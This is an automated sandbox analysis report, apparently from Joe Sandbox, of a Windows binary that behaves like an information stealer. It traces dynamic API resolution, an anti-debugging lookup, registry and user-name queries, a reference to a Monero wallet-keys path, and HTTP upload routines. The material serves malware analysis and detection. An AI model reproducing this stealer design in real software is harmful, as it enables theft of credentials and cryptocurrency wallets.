100a7a0 lstrcpy 15600->15601 15603 1008776 15601->15603 15602 100a8a0 lstrcpy 15602->15605 15603->15052 15604 100a9b0 lstrcpy lstrlen lstrcpy lstrcat 15604->15605 15605->15599 15605->15602 15605->15604 15607 100a7a0 lstrcpy 15606->15607 15608 10051b5 15607->15608 15609 ff1590 lstrcpy 15608->15609 15610 10051c6 15609->15610 15625 ff5100 15610->15625 15612 10051cf 15612->15064 15616 1007720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15613->15616 15615 10076b9 15615->15488 15615->15489 15617 1007780 RegCloseKey 15616->15617 15618 1007765 RegQueryValueExA 15616->15618 15619 1007793 15617->15619 15618->15617 15619->15615 15620->15500 15622 10089f9 GetProcessHeap HeapFree 15621->15622 15623 1008a0c 15621->15623 15622->15623 15623->15536 15624->15536 15626 100a7a0 lstrcpy 15625->15626 15627 ff5119 15626->15627 15628 ff47b0 2 API calls 15627->15628 15629 ff5125 15628->15629 15785 1008ea0 15629->15785 15631 ff5184 15632 ff5192 lstrlen 15631->15632 15633 ff51a5 15632->15633 15634 1008ea0 4 API calls 15633->15634 15635 ff51b6 15634->15635 15636 100a740 lstrcpy 15635->15636 15637 ff51c9 15636->15637 15638 100a740 lstrcpy 15637->15638 15639 ff51d6 15638->15639 15640 100a740 lstrcpy 15639->15640 15641 ff51e3 15640->15641 15642 100a740 lstrcpy 15641->15642 15643 ff51f0 15642->15643 15644 100a740 lstrcpy 15643->15644 15645 ff51fd InternetOpenA StrCmpCA 15644->15645 15646 ff522f 15645->15646 15647 ff58c4 InternetCloseHandle 15646->15647 15648 1008b60 3 API calls 15646->15648 15654 ff58d9 ctype 15647->15654 15649 ff524e 15648->15649 15650 100a920 3 API calls 15649->15650 15651 ff5261 15650->15651 15652 100a8a0 lstrcpy 15651->15652 15653 ff526a 15652->15653 15655 100a9b0 4 API calls 15653->15655 15658 100a7a0 lstrcpy 15654->15658 15656 ff52ab 15655->15656 15657 100a920 3 API calls 15656->15657 15659 ff52b2 15657->15659 15665 ff5913 15658->15665 15660 100a9b0 4 API calls 15659->15660 15661 ff52b9 15660->15661 15662 100a8a0 lstrcpy 15661->15662 15663 ff52c2 15662->15663 15664 100a9b0 4 API calls 15663->15664 15666 ff5303 15664->15666 15665->15612 15667 100a920 3 API calls 15666->15667 15668 ff530a 15667->15668 15669 100a8a0 lstrcpy 15668->15669 15670 ff5313 15669->15670 15671 ff5329 InternetConnectA 15670->15671 15671->15647 15672 ff5359 HttpOpenRequestA 15671->15672 15674 ff58b7 InternetCloseHandle 15672->15674 15675 ff53b7 15672->15675 15674->15647 15676 100a9b0 4 API calls 15675->15676 15677 ff53cb 15676->15677 15678 100a8a0 lstrcpy 15677->15678 15679 ff53d4 15678->15679 15680 100a920 3 API calls 15679->15680 15681 ff53f2 15680->15681 15682 100a8a0 lstrcpy 15681->15682 15683 ff53fb 15682->15683 15684 100a9b0 4 API calls 15683->15684 15685 ff541a 15684->15685 15686 100a8a0 lstrcpy 15685->15686 15687 ff5423 15686->15687 15688 100a9b0 4 API calls 15687->15688 15689 ff5444 15688->15689 15690 100a8a0 lstrcpy 15689->15690 15691 ff544d 15690->15691 15692 100a9b0 4 API calls 15691->15692 15693 ff546e 15692->15693 15786 1008ead CryptBinaryToStringA 15785->15786 15790 1008ea9 15785->15790 15787 1008ece GetProcessHeap RtlAllocateHeap 15786->15787 15786->15790 15788 1008ef4 ctype 15787->15788 15787->15790 15789 1008f05 CryptBinaryToStringA 15788->15789 15789->15790 15790->15631 15794->15067 16037 ff9880 15795->16037 15797 ff98e1 15797->15074 15799 100a740 lstrcpy 15798->15799 15972 100a740 lstrcpy 15971->15972 15973 1000266 15972->15973 15974 1008de0 2 API calls 15973->15974 15975 100027b 15974->15975 15976 100a920 3 API calls 15975->15976 15977 100028b 15976->15977 15978 100a8a0 lstrcpy 15977->15978 15979 1000294 15978->15979 15980 100a9b0 4 API calls 15979->15980 16038 ff988e 16037->16038 16041 ff6fb0 16038->16041 16040 ff98ad ctype 16040->15797 16044 ff6d40 16041->16044 16045 ff6d63 16044->16045 16058 ff6d59 16044->16058 16060 ff6530 16045->16060 16049 ff6dbe 16049->16058 16070 ff69b0 16049->16070 16051 ff6e2a 16052 ff6ee6 VirtualFree 16051->16052 16054 ff6ef7 16051->16054 16051->16058 16052->16054 16053 ff6f41 16055 10089f0 2 API calls 16053->16055 16053->16058 16054->16053 16056 ff6f38 16054->16056 16057 ff6f26 FreeLibrary 16054->16057 16055->16058 16059 10089f0 2 API calls 16056->16059 16057->16054 16058->16040 16059->16053 16061 ff6542 16060->16061 16063 ff6549 16061->16063 16080 1008a10 GetProcessHeap RtlAllocateHeap 16061->16080 16063->16058 16064 ff6660 16063->16064 16065 ff668f VirtualAlloc 16064->16065 16067 ff673c 16065->16067 16068 ff6730 16065->16068 16067->16049 16068->16067 16069 ff6743 VirtualAlloc 16068->16069 16069->16067 16071 ff69c9 16070->16071 16076 ff69d5 16070->16076 16072 ff6a09 LoadLibraryA 16071->16072 16071->16076 16074 ff6a32 16072->16074 16072->16076 16073 ff6ae0 16073->16076 16078 ff6ba8 GetProcAddress 16073->16078 16074->16073 16081 1008a10 GetProcessHeap RtlAllocateHeap 16074->16081 16076->16051 16077 ff6a8b 16077->16076 16079 10089f0 2 API calls 16077->16079 16078->16073 16078->16076 16079->16073 16080->16063 16081->16077

                              Executed Functions

                              Function 01009860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetProcAddress.KERNEL32(76210000,01981718), ref: 010098A1
                              • GetProcAddress.KERNEL32(76210000,019817D8), ref: 010098BA
                              • GetProcAddress.KERNEL32(76210000,019816D0), ref: 010098D2
                              • GetProcAddress.KERNEL32(76210000,01981730), ref: 010098EA
                              • GetProcAddress.KERNEL32(76210000,01981580), ref: 01009903
                              • GetProcAddress.KERNEL32(76210000,01988A30), ref: 0100991B
                              • GetProcAddress.KERNEL32(76210000,01975650), ref: 01009933
                              • GetProcAddress.KERNEL32(76210000,019753B0), ref: 0100994C
                              • GetProcAddress.KERNEL32(76210000,01981598), ref: 01009964
                              • GetProcAddress.KERNEL32(76210000,019816E8), ref: 0100997C
                              • GetProcAddress.KERNEL32(76210000,019815C8), ref: 01009995
                              • GetProcAddress.KERNEL32(76210000,019815E0), ref: 010099AD
                              • GetProcAddress.KERNEL32(76210000,01975670), ref: 010099C5
                              • GetProcAddress.KERNEL32(76210000,01981610), ref: 010099DE
                              • GetProcAddress.KERNEL32(76210000,01981760), ref: 010099F6
                              • GetProcAddress.KERNEL32(76210000,019755B0), ref: 01009A0E
                              • GetProcAddress.KERNEL32(76210000,01981778), ref: 01009A27
                              • GetProcAddress.KERNEL32(76210000,01981640), ref: 01009A3F
                              • GetProcAddress.KERNEL32(76210000,01975510), ref: 01009A57
                              • GetProcAddress.KERNEL32(76210000,01981820), ref: 01009A70
                              • GetProcAddress.KERNEL32(76210000,019754D0), ref: 01009A88
                              • LoadLibraryA.KERNEL32(019818B0,?,01006A00), ref: 01009A9A
                              • LoadLibraryA.KERNEL32(01981898,?,01006A00), ref: 01009AAB
                              • LoadLibraryA.KERNEL32(01981868,?,01006A00), ref: 01009ABD
                              • LoadLibraryA.KERNEL32(01981838,?,01006A00), ref: 01009ACF
                              • LoadLibraryA.KERNEL32(01981880,?,01006A00), ref: 01009AE0
                              • GetProcAddress.KERNEL32(75B30000,019817F0), ref: 01009B02
                              • GetProcAddress.KERNEL32(751E0000,01981808), ref: 01009B23
                              • GetProcAddress.KERNEL32(751E0000,01981850), ref: 01009B3B
                              • GetProcAddress.KERNEL32(76910000,01988DD8), ref: 01009B5D
                              • GetProcAddress.KERNEL32(75670000,019753D0), ref: 01009B7E
                              • GetProcAddress.KERNEL32(77310000,01988900), ref: 01009B9F
                              • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 01009BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 01009BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: a00ca2f16a9093ad1f57a9e651fef7133125f5630a4f54eb954ba15389ef39fa
                              • Instruction ID: 2bb30d617bde625b0d3af5d1d31a851846d7c96aa739f9b16d6782413d5e9e8f
                              • Opcode Fuzzy Hash: a00ca2f16a9093ad1f57a9e651fef7133125f5630a4f54eb954ba15389ef39fa
                              • Instruction Fuzzy Hash: D9A15BB55052409FD36AEFA8F98CE6A3BF9F79C701704853AA68AC724CD7399841DF10
                              Function 00FF45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 ff45c0-ff4695 RtlAllocateHeap 781 ff46a0-ff46a6 764->781 782 ff474f-ff47a9 VirtualProtect 781->782 783 ff46ac-ff474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FF460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00FF479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF46CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FF45DD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 77a48a72d76f7343dd18e7e1c6cfac01218cf83067a8a9474dbad6e7e5196977
                              • Instruction ID: b37d09c84c8cc7c9aad032671875410b08472c31788667c040e9fd9febfbe9aa
                              • Opcode Fuzzy Hash: 77a48a72d76f7343dd18e7e1c6cfac01218cf83067a8a9474dbad6e7e5196977
                              • Instruction Fuzzy Hash: 074130707CB7146A8634FBA58C6EF9D7663DF936D0F40504EB8709E204CAA66508CDAA
                              Function 00FF4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 ff4880-ff4942 call 100a7a0 call ff47b0 call 100a740 * 5 InternetOpenA StrCmpCA 816 ff494b-ff494f 801->816 817 ff4944 801->817 818 ff4ecb-ff4ef3 InternetCloseHandle call 100aad0 call ff9ac0 816->818 819 ff4955-ff4acd call 1008b60 call 100a920 call 100a8a0 call 100a800 * 2 call 100a9b0 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a920 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a9b0 call 100a920 call 100a8a0 call 100a800 * 2 InternetConnectA 816->819 817->816 829 ff4ef5-ff4f2d call 100a820 call 100a9b0 call 100a8a0 call 100a800 818->829 830 ff4f32-ff4fa2 call 1008990 * 2 call 100a7a0 call 100a800 * 8 818->830 819->818 905 ff4ad3-ff4ad7 819->905 829->830 906 ff4ad9-ff4ae3 905->906 907 ff4ae5 905->907 908 ff4aef-ff4b22 HttpOpenRequestA 906->908 907->908 909 ff4ebe-ff4ec5 InternetCloseHandle 908->909 910 ff4b28-ff4e28 call 100a9b0 call 100a8a0 call 100a800 call 100a920 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a920 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a920 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a9b0 call 100a8a0 call 100a800 call 100a920 call 100a8a0 call 100a800 call 100a740 call 100a920 * 2 call 100a8a0 call 100a800 * 2 call 100aad0 lstrlen call 100aad0 * 2 lstrlen call 100aad0 HttpSendRequestA 908->910 909->818 1021 ff4e32-ff4e5c InternetReadFile 910->1021 1022 ff4e5e-ff4e65 1021->1022 1023 ff4e67-ff4eb9 InternetCloseHandle call 100a800 1021->1023 1022->1023 1024 ff4e69-ff4ea7 call 100a9b0 call 100a8a0 call 100a800 1022->1024 1023->909 1024->1021
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FF4839
                                • Part of subcall function 00FF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FF4849
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FF4915
                              • StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,01010DDB,00000000,?,?,00000000,?,",00000000,?,0198FA98), ref: 00FF4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FF4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FF4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FF4E49
                              • InternetCloseHandle.WININET(00000000), ref: 00FF4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00FF4EC5
                              • HttpOpenRequestA.WININET(00000000,0198FA28,?,0198F400,00000000,00000000,00400100,00000000), ref: 00FF4B15
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • InternetCloseHandle.WININET(00000000), ref: 00FF4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 1d79ce4f14169516b66c2fa7220d65cff4c281fdf439ec35e74a03e26aefe94e
                              • Instruction ID: b71187582ce10f052c9c54e3a3a7bea18c0d37b1ecde2f5239edcf3e0084f94b
                              • Opcode Fuzzy Hash: 1d79ce4f14169516b66c2fa7220d65cff4c281fdf439ec35e74a03e26aefe94e
                              • Instruction Fuzzy Hash: 0912CF71A10219EAEB16EB90DD95FEEB379BF24300F5041A9A186670D0EF742F49CF61
                              Function 01007850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FF11B7), ref: 01007880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01007887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0100789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
